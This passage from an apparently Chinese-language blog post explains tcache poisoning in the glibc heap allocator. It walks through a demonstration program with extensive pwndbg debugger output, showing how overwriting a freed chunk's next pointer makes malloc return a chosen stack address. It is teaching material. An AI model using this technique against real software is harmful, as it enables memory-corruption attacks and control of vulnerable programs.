0x55f666ee1260 to point to the location to control <span class="o">(</span>0x7fff0d28a0c8<span class="o">)</span>. 1st malloc<span class="o">(</span>128<span class="o">)</span>: 0x55f666ee1260 Now the tcache list has <span class="o">[</span> 0x7fff0d28a0c8 <span class="o">]</span>. 2st malloc<span class="o">(</span>128<span class="o">)</span>: 0x7fff0d28a0c8 We got the control </code></pre></td></tr></table> </div> </div><p>分析一下，程序先申请了一个大小是 128 的 chunk，然后 free。128 在 tcache 的范围内，因此 free 之后该 chunk 被放到了 tcache 中，调试如下：</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span><span class="lnt">80 </span><span class="lnt">81 </span><span class="lnt">82 </span><span class="lnt">83 </span><span class="lnt">84 </span><span class="lnt">85 </span><span class="lnt">86 </span><span class="lnt">87 </span><span class="lnt">88 </span><span class="lnt">89 </span><span class="lnt">90 </span><span class="lnt">91 </span><span class="lnt">92 </span><span class="lnt">93 </span><span class="lnt">94 </span><span class="lnt">95 </span><span class="lnt">96 </span><span class="lnt">97 </span><span class="lnt">98 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="mi">0x0000555555554815</span> <span class="mi">18</span> <span class="no">free</span><span class="p">(</span><span class="no">a</span><span class="p">)</span><span class="c">; </span><span class="c"></span><span class="no">LEGEND</span><span class="p">:</span> <span class="no">STACK</span> <span class="err">|</span> <span class="no">HEAP</span> <span class="err">|</span> <span class="no">CODE</span> <span class="err">|</span> <span class="no">DATA</span> <span class="err">|</span> <span class="no">RWX</span> <span class="err">|</span> <span class="no">RODATA</span> <span class="err">──────────────────────────────────────[</span> <span class="nf">REGISTERS</span> <span class="p">]</span><span class="err">──────────────────────────────────────</span> <span class="na">......</span> <span class="nf">RDI</span> <span class="mi">0x555555756260</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="na">......</span> <span class="nf">RIP</span> <span class="mi">0x555555554815</span> <span class="p">(</span><span class="no">main</span><span class="err">+</span><span class="mi">187</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">call</span> <span class="mi">0x555555554600</span> <span class="err">───────────────────────────────────────[</span> <span class="nf">DISASM</span> <span class="p">]</span><span class="err">────────────────────────────────────────</span> <span class="na">......</span> <span class="err">►</span> <span class="err">0</span><span class="nf">x555555554815</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">187</span><span class="err">&gt;</span> <span class="no">call</span> <span class="no">free@plt</span> <span class="err">&lt;</span><span class="mi">0x555555554600</span><span class="err">&gt;</span> <span class="nl">ptr:</span> <span class="err">0</span><span class="nf">x555555756260</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="na">......</span> <span class="err">────────────────────────────────────[</span> <span class="nf">SOURCE</span> <span class="p">(</span><span class="no">CODE</span><span class="p">)</span> <span class="p">]</span><span class="err">────────────────────────────────────</span> <span class="na">......</span> <span class="err">►</span> <span class="err">18</span> <span class="nf">free</span><span class="p">(</span><span class="no">a</span><span class="p">)</span><span class="c">; </span><span class="c"></span><span class="no">......</span> <span class="err">────────────────────────────────────────[</span> <span class="nf">STACK</span> <span class="p">]</span><span class="err">────────────────────────────────────────</span> <span class="na">......</span> <span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">ni</span> <span class="err">20</span> <span class="nf">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">Now</span> <span class="no">the</span> <span class="no">tcache</span> <span class="no">list</span> <span class="no">has</span> <span class="p">[</span> <span class="nv">%p</span> <span class="p">].</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">a</span><span class="p">)</span><span class="c">; </span><span class="c"></span><span class="no">LEGEND</span><span class="p">:</span> <span class="no">STACK</span> <span class="err">|</span> <span class="no">HEAP</span> <span class="err">|</span> <span class="no">CODE</span> <span class="err">|</span> <span class="no">DATA</span> <span class="err">|</span> <span class="no">RWX</span> <span class="err">|</span> <span class="no">RODATA</span> <span class="err">──────────────────────────────────────[</span> <span class="nf">REGISTERS</span> <span class="p">]</span><span class="err">──────────────────────────────────────</span> <span class="nf">RAX</span> <span class="mi">0x0</span> <span class="nf">RBX</span> <span class="mi">0x0</span> <span class="nf">RCX</span> <span class="mi">0x7</span> <span class="nf">RDX</span> <span class="mi">0x0</span> <span class="nf">RDI</span> <span class="mi">0x1</span> <span class="nf">RSI</span> <span class="mi">0x555555756010</span> <span class="err">◂—</span> <span class="mi">0x100000000000000</span> <span class="nf">R8</span> <span class="mi">0x0</span> <span class="nf">R9</span> <span class="mi">0x7fffffffb78c</span> <span class="err">◂—</span> <span class="mi">0x1c00000000</span> <span class="nf">R10</span> <span class="mi">0x911</span> <span class="nf">R11</span> <span class="mi">0x7ffff7aa0ba0</span> <span class="p">(</span><span class="no">free</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">rbx</span> <span class="nf">R12</span> <span class="mi">0x555555554650</span> <span class="p">(</span><span class="no">_start</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">ebp</span><span class="p">,</span> <span class="no">ebp</span> <span class="nf">R13</span> <span class="mi">0x7fffffffe0a0</span> <span class="err">◂—</span> <span class="mi">0x1</span> <span class="nf">R14</span> <span class="mi">0x0</span> <span class="nf">R15</span> <span class="mi">0x0</span> <span class="nf">RBP</span> <span class="mi">0x7fffffffdfc0</span> <span class="err">—▸</span> <span class="mi">0x555555554910</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="nf">RSP</span> <span class="mi">0x7fffffffdfa0</span> <span class="err">—▸</span> <span class="mi">0x555555554910</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="nf">RIP</span> <span class="mi">0x55555555481a</span> <span class="p">(</span><span class="no">main</span><span class="err">+</span><span class="mi">192</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">mov</span> <span class="no">rax</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rip</span> <span class="err">+</span> <span class="mi">0x20083f</span><span class="p">]</span> <span class="err">───────────────────────────────────────[</span> <span class="nf">DISASM</span> <span class="p">]</span><span class="err">────────────────────────────────────────</span> <span class="err">0</span><span class="nf">x555555554802</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">168</span><span class="err">&gt;</span> <span class="no">lea</span> <span class="no">rdi</span><span class="p">,</span> <span class="p">[</span><span class="no">rip</span> <span class="err">+</span> <span class="mi">0x2bd</span><span class="p">]</span> <span class="err">0</span><span class="nf">x555555554809</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">175</span><span class="err">&gt;</span> <span class="no">call</span> <span class="no">fwrite@plt</span> <span class="err">&lt;</span><span class="mi">0x555555554630</span><span class="err">&gt;</span> <span class="err">0</span><span class="nf">x55555555480e</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">180</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rax</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rbp</span> <span class="p">-</span> <span class="mi">8</span><span class="p">]</span> <span class="err">0</span><span class="nf">x555555554812</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">184</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rdi</span><span class="p">,</span> <span class="no">rax</span> <span class="err">0</span><span class="nf">x555555554815</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">187</span><span class="err">&gt;</span> <span class="no">call</span> <span class="no">free@plt</span> <span class="err">&lt;</span><span class="mi">0x555555554600</span><span class="err">&gt;</span> <span class="err">►</span> <span class="err">0</span><span class="nf">x55555555481a</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">192</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rax</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rip</span> <span class="err">+</span> <span class="mi">0x20083f</span><span class="p">]</span> <span class="err">&lt;</span><span class="mi">0x555555755060</span><span class="err">&gt;</span> <span class="err">0</span><span class="nf">x555555554821</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">199</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rdx</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rbp</span> <span class="p">-</span> <span class="mi">8</span><span class="p">]</span> <span class="err">0</span><span class="nf">x555555554825</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">203</span><span class="err">&gt;</span> <span class="no">lea</span> <span class="no">rsi</span><span class="p">,</span> <span class="p">[</span><span class="no">rip</span> <span class="err">+</span> <span class="mi">0x2b4</span><span class="p">]</span> <span class="err">0</span><span class="nf">x55555555482c</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">210</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rdi</span><span class="p">,</span> <span class="no">rax</span> <span class="err">0</span><span class="nf">x55555555482f</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">213</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">eax</span><span class="p">,</span> <span class="mi">0</span> <span class="err">0</span><span class="nf">x555555554834</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">218</span><span class="err">&gt;</span> <span class="no">call</span> <span class="no">fprintf@plt</span> <span class="err">&lt;</span><span class="mi">0x555555554610</span><span class="err">&gt;</span> <span class="err">────────────────────────────────────[</span> <span class="nf">SOURCE</span> <span class="p">(</span><span class="no">CODE</span><span class="p">)</span> <span class="p">]</span><span class="err">────────────────────────────────────</span> <span class="err">15</span> <span class="nf">intptr_t</span> <span class="p">*</span><span class="no">a</span> <span class="err">=</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">16</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">):</span> <span class="nv">%p</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">a</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">17</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">Freeing</span> <span class="no">the</span> <span class="no">buffer...</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">18</span> <span class="no">free</span><span class="p">(</span><span class="no">a</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">19</span> <span class="err">►</span> <span class="mi">20</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">Now</span> <span class="no">the</span> <span class="no">tcache</span> <span class="no">list</span> <span class="no">has</span> <span class="p">[</span> <span class="nv">%p</span> <span class="p">].</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">a</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">21</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">We</span> <span class="no">overwrite</span> <span class="no">the</span> <span class="no">first</span> <span class="nv">%lu</span> <span class="no">bytes</span> <span class="p">(</span><span class="no">fd</span><span class="err">/</span><span class="no">next</span> <span class="no">pointer</span><span class="p">)</span> <span class="no">of</span> <span class="no">the</span> <span class="no">data</span> <span class="no">at</span> <span class="nv">%p</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span> <span class="err">22</span> <span class="err">&#34;</span><span class="nf">to</span> <span class="no">point</span> <span class="no">to</span> <span class="no">the</span> <span class="no">location</span> <span class="no">to</span> <span class="no">control</span> <span class="p">(</span><span class="nv">%p</span><span class="p">).</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">sizeof</span><span class="p">(</span><span class="no">intptr_t</span><span class="p">),</span> <span class="no">a</span><span class="p">,</span> <span class="err">&amp;</span><span class="no">stack_var</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">23</span> <span class="no">a</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="err">=</span> <span class="p">(</span><span class="no">intptr_t</span><span class="p">)</span><span class="err">&amp;</span><span class="no">stack_var</span><span class="c">; </span><span class="c"></span> <span class="mi">24</span> <span class="mi">25</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="mi">1</span><span class="no">st</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">):</span> <span class="nv">%p</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">))</span><span class="c">; </span><span class="c"></span><span class="err">────────────────────────────────────────</span><span class="p">[</span> <span class="no">STACK</span> <span class="p">]</span><span class="err">────────────────────────────────────────</span> <span class="err">00:0000│</span> <span class="nf">rsp</span> <span class="mi">0x7fffffffdfa0</span> <span class="err">—▸</span> <span class="mi">0x555555554910</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="err">01:0008│</span> <span class="err">0</span><span class="nf">x7fffffffdfa8</span> <span class="err">—▸</span> <span class="mi">0x555555554650</span> <span class="p">(</span><span class="no">_start</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">ebp</span><span class="p">,</span> <span class="no">ebp</span> <span class="err">02:0010│</span> <span class="err">0</span><span class="nf">x7fffffffdfb0</span> <span class="err">—▸</span> <span class="mi">0x7fffffffe0a0</span> <span class="err">◂—</span> <span class="mi">0x1</span> <span class="err">03:0018│</span> <span class="err">0</span><span class="nf">x7fffffffdfb8</span> <span class="err">—▸</span> <span class="mi">0x555555756260</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="err">04:0020│</span> <span class="nf">rbp</span> <span class="mi">0x7fffffffdfc0</span> <span class="err">—▸</span> <span class="mi">0x555555554910</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="err">05:0028│</span> <span class="err">0</span><span class="nf">x7fffffffdfc8</span> <span class="err">—▸</span> <span class="mi">0x7ffff7a3fa87</span> <span class="p">(</span><span class="no">__libc_start_main</span><span class="err">+</span><span class="mi">231</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">mov</span> <span class="no">edi</span><span class="p">,</span> <span class="no">eax</span> <span class="err">06:0030│</span> <span class="err">0</span><span class="nf">x7fffffffdfd0</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="err">07:0038│</span> <span class="err">0</span><span class="nf">x7fffffffdfd8</span> <span class="err">—▸</span> <span class="mi">0x7fffffffe0a8</span> <span class="err">—▸</span> <span class="mi">0x7fffffffe3c6</span> <span class="err">◂—</span> <span class="mi">0x346d2f656d6f682f</span> <span class="p">(</span><span class="err">&#39;/</span><span class="no">home</span><span class="err">/</span><span class="no">m4</span><span class="err">&#39;</span><span class="p">)</span> <span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">heapinfo</span> <span class="err">3886144</span> <span class="err">(0</span><span class="nf">x20</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">0</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x30</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">1</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x40</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">2</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x50</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">3</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x60</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">4</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x70</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">5</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x80</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">6</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x90</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">7</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">xa0</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">8</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">xb0</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">9</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="nl">top:</span> <span class="err">0</span><span class="nf">x5555557562e0</span> <span class="p">(</span><span class="no">size</span> <span class="p">:</span> <span class="mi">0x20d20</span><span class="p">)</span> <span class="no">last_remainder</span><span class="p">:</span> <span class="mi">0x0</span> <span class="p">(</span><span class="no">size</span> <span class="p">:</span> <span class="mi">0x0</span><span class="p">)</span> <span class="no">unsortbin</span><span class="p">:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x90</span><span class="p">)</span> <span class="no">tcache_entry</span><span class="p">[</span><span class="mi">7</span><span class="p">]:</span> <span class="mi">0x555555756260</span> <span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">heapbase</span> <span class="nf">heapbase</span> <span class="p">:</span> <span class="mi">0x555555756000</span> <span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">p</span> <span class="p">*(</span><span class="no">struct</span> <span class="no">tcache_perthread_struct</span><span class="p">*)</span><span class="mi">0x555555756010</span> <span class="nf">$3</span> <span class="err">=</span> <span class="err">{</span> <span class="nf">counts</span> <span class="err">=</span> <span class="err">&#34;\</span><span class="mi">000</span><span class="err">\</span><span class="mi">000</span><span class="err">\</span><span class="mi">000</span><span class="err">\</span><span class="mi">000</span><span class="err">\</span><span class="mi">000</span><span class="err">\</span><span class="mi">000</span><span class="err">\</span><span class="mi">000</span><span class="err">\</span><span class="mi">001</span><span class="err">&#34;</span><span class="p">,</span> <span class="err">&#39;\</span><span class="mi">000</span><span class="err">&#39;</span> <span class="err">&lt;</span><span class="no">repeats</span> <span class="mi">55</span> <span class="no">times</span><span class="err">&gt;</span><span class="p">,</span> <span class="nf">entries</span> <span class="err">=</span> <span class="err">{</span><span class="mi">0x0</span><span class="p">,</span> <span class="mi">0x0</span><span class="p">,</span> <span class="mi">0x0</span><span class="p">,</span> <span class="mi">0x0</span><span class="p">,</span> <span class="mi">0x0</span><span class="p">,</span> <span class="mi">0x0</span><span class="p">,</span> <span class="mi">0x0</span><span class="p">,</span> <span class="mi">0x555555756260</span><span class="p">,</span> <span class="mi">0x0</span> <span class="err">&lt;</span><span class="no">repeats</span> <span class="mi">56</span> <span class="no">times</span><span class="err">&gt;}</span> <span class="err">}</span> </code></pre></td></tr></table> </div> </div><p>可以看到，此时第 8 条 tcache 链上已经有了一个 chunk，从 <code>tcache_prethread_struct</code> 结构体中也能得到同样的结论</p> <p>然后修改 tcache 的 next</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span><span class="lnt">116 </span><span class="lnt">117 </span><span class="lnt">118 </span><span class="lnt">119 </span><span class="lnt">120 </span><span class="lnt">121 </span><span class="lnt">122 </span><span class="lnt">123 </span><span class="lnt">124 </span><span class="lnt">125 </span><span class="lnt">126 </span><span class="lnt">127 </span><span class="lnt">128 </span><span class="lnt">129 </span><span class="lnt">130 </span><span class="lnt">131 </span><span class="lnt">132 </span><span class="lnt">133 </span><span class="lnt">134 </span><span class="lnt">135 </span><span class="lnt">136 </span><span class="lnt">137 </span><span class="lnt">138 </span><span class="lnt">139 </span><span class="lnt">140 </span><span class="lnt">141 </span><span class="lnt">142 </span><span class="lnt">143 </span><span class="lnt">144 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">We</span> <span class="no">overwrite</span> <span class="no">the</span> <span class="no">first</span> <span class="mi">8</span> <span class="no">bytes</span> <span class="p">(</span><span class="no">fd</span><span class="err">/</span><span class="no">next</span> <span class="no">pointer</span><span class="p">)</span> <span class="no">of</span> <span class="no">the</span> <span class="no">data</span> <span class="no">at</span> <span class="mi">0x555555756260</span> <span class="nf">to</span> <span class="no">point</span> <span class="no">to</span> <span class="no">the</span> <span class="no">location</span> <span class="no">to</span> <span class="no">control</span> <span class="p">(</span><span class="mi">0x7fffffffdfa8</span><span class="p">).</span> <span class="err">23</span> <span class="nf">a</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="err">=</span> <span class="p">(</span><span class="no">intptr_t</span><span class="p">)</span><span class="err">&amp;</span><span class="no">stack_var</span><span class="c">; </span><span class="c"></span><span class="no">LEGEND</span><span class="p">:</span> <span class="no">STACK</span> <span class="err">|</span> <span class="no">HEAP</span> <span class="err">|</span> <span class="no">CODE</span> <span class="err">|</span> <span class="no">DATA</span> <span class="err">|</span> <span class="no">RWX</span> <span class="err">|</span> <span class="no">RODATA</span> <span class="err">──────────────────────────────────────[</span> <span class="nf">REGISTERS</span> <span class="p">]</span><span class="err">──────────────────────────────────────</span> <span class="nf">RAX</span> <span class="mi">0x85</span> <span class="nf">RBX</span> <span class="mi">0x0</span> <span class="nf">RCX</span> <span class="mi">0x0</span> <span class="nf">RDX</span> <span class="mi">0x7ffff7dd48b0</span> <span class="p">(</span><span class="no">_IO_stdfile_2_lock</span><span class="p">)</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="nf">RDI</span> <span class="mi">0x0</span> <span class="nf">RSI</span> <span class="mi">0x7fffffffb900</span> <span class="err">◂—</span> <span class="mi">0x777265766f206557</span> <span class="p">(</span><span class="err">&#39;</span><span class="no">We</span> <span class="no">overw</span><span class="err">&#39;</span><span class="p">)</span> <span class="nf">R8</span> <span class="mi">0x7ffff7fd14c0</span> <span class="err">◂—</span> <span class="mi">0x7ffff7fd14c0</span> <span class="nf">R9</span> <span class="mi">0x7fffffffb78c</span> <span class="err">◂—</span> <span class="mi">0x8500000000</span> <span class="nf">R10</span> <span class="mi">0x0</span> <span class="nf">R11</span> <span class="mi">0x246</span> <span class="nf">R12</span> <span class="mi">0x555555554650</span> <span class="p">(</span><span class="no">_start</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">ebp</span><span class="p">,</span> <span class="no">ebp</span> <span class="nf">R13</span> <span class="mi">0x7fffffffe0a0</span> <span class="err">◂—</span> <span class="mi">0x1</span> <span class="nf">R14</span> <span class="mi">0x0</span> <span class="nf">R15</span> <span class="mi">0x0</span> <span class="nf">RBP</span> <span class="mi">0x7fffffffdfc0</span> <span class="err">—▸</span> <span class="mi">0x555555554910</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="nf">RSP</span> <span class="mi">0x7fffffffdfa0</span> <span class="err">—▸</span> <span class="mi">0x555555554910</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="nf">RIP</span> <span class="mi">0x555555554867</span> <span class="p">(</span><span class="no">main</span><span class="err">+</span><span class="mi">269</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">lea</span> <span class="no">rdx</span><span class="p">,</span> <span class="p">[</span><span class="no">rbp</span> <span class="p">-</span> <span class="mi">0x18</span><span class="p">]</span> <span class="err">───────────────────────────────────────[</span> <span class="nf">DISASM</span> <span class="p">]</span><span class="err">────────────────────────────────────────</span> <span class="err">►</span> <span class="err">0</span><span class="nf">x555555554867</span> <span class="err">&lt;</span><span class="no">main</span><span 